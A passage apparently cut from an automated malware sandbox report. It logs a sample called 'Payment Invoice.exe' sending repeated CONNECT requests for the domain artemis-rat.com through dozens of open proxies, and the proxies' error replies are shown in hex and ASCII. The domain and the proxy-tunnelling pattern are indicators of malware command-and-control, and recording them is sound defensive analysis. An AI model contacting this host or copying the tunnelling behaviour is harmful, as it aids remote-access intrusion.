                                                                Mar 11, 2024 16:15:20.009108067 CET577INData Raw: 6d 70 6c 65 2c 20 79 6f 75 20 63 61 6e 20 6e 6f 74 20 50 4f 53 54 20 61 20 47 6f 70 68 65 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 70 3e 59 6f 75 72 20 63 61 63 68 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 73 20 3c 61 20 68 72
                                                                Data Ascii: mple, you can not POST a Gopher request.</p><p>Your cache administrator is <a href="mailto:support@dnsadvantage.com?subject=CacheErrorInfo%20-%20ERR_UNSUP_REQ&amp;body=CacheHost%3A%20.%0D%0AErrPage%3A%20ERR_UNSUP_REQ%0D%0AErr%3A%20%5Bnone%5D


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1196192.168.2.45350493.157.248.108887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.845957994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1197192.168.2.453529139.59.99.83807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.849473000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.191183090 CET891INHTTP/1.1 400 Bad Request
                                                                content-type: text/html
                                                                cache-control: private, no-cache, max-age=0
                                                                pragma: no-cache
                                                                content-length: 679
                                                                date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                server: LiteSpeed
                                                                connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1198192.168.2.45346843.231.22.228807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.854336023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.342941999 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1199192.168.2.453711185.162.229.112807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.867109060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.025588036 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1200192.168.2.4537121.0.0.4807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.879283905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.035068989 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1201192.168.2.45358613.37.89.20131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.887744904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.190045118 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1202192.168.2.453415103.242.119.88807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.887744904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.442642927 CET629INHTTP/1.1 407 Proxy Authentication Required
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Server: Apache
                                                                Proxy-Authenticate: Basic realm="Authorization"
                                                                Content-Length: 415
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1203192.168.2.453726104.17.215.222807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.891315937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.046849966 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1204192.168.2.453602158.255.215.50118577076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.891335964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.191521883 CET339INHTTP/1.1 403 Forbidden
                                                                Server: squid/4.7
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 5
                                                                X-Squid-Error: TCP_RESET 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                X-Cache: MISS from proxy.wakoopa.com
                                                                Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                Connection: keep-alive
                                                                Data Raw: 72 65 73 65 74
                                                                Data Ascii: reset


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1205192.168.2.453569119.196.168.183807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.902654886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1206192.168.2.45353451.89.14.70807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.902659893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.918210983 CET176INHTTP/1.1 404 Not Found
                                                                Content-Type: text/plain; charset=utf-8
                                                                X-Content-Type-Options: nosniff
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Length: 19
                                                                Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                Data Ascii: 404 page not found


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1207192.168.2.453747104.24.15.158807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.904658079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.059508085 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1208192.168.2.45372235.190.107.16300007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.904963017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1209192.168.2.453566183.230.162.12290917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.906023026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.285257101 CET325INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.1
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1210192.168.2.45357045.11.95.16560107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.906039000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1211192.168.2.452996167.99.174.59807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.906639099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.628642082 CET806INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Server: Apache/2.4.18 (Ubuntu)
                                                                Content-Length: 614
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1212192.168.2.45364266.84.6.21519967076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.910372019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511389971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.324248075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.826572895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
